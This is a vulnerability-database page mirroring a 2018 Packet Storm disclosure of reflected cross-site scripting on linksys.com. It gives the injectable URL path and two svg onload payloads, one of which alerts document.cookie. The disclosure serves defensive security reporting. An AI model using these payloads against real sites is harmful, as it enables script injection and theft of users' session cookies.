Lucene search

K

Linksys.com Cross Site Scripting

🗓️ 23 Jul 2018 00:00:00Reported by Ismail TasdelenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Reflected XSS at Linksys, risk medium, XSS payloads, PoC

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`# Exploit Title: [ Reflected XSS at Linksys ]  
# Date: [ 02.06.2018 ]   
# Exploit Author: [ Ismail Tasdelen ]  
# Vendor Homepage: [ https://www.linksys.com/ ]  
# Software Type : [ Website ]  
# Software Version : [ N/A ]  
# Vulenrability : [ Reflected Cross-site Scripting (XSS) ]  
# Risk : [ Medium ]  
  
# PoC :  
  
Method : https://www.linksys.com/[country]/ + XSS Payload  
  
XSS Payloads :  
  
"><svg onload=alert('ismailtasdelen')>/  
  
"><svg onload=alert(document.cookie)>/  
  
Poc Video --> https://www.youtube.com/watch?v=CrRm7eSqSRI  
  
# You want to follow my activity ?  
  
https://www.linkedin.com/in/ismailtasdelen  
https://github.com/ismailtasdelen  
https://packetstormsecurity.com/user/ismailtasdelen  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Jul 2018 00:00Current
7.4High risk
Vulners AI Score7.4
21
.json
Report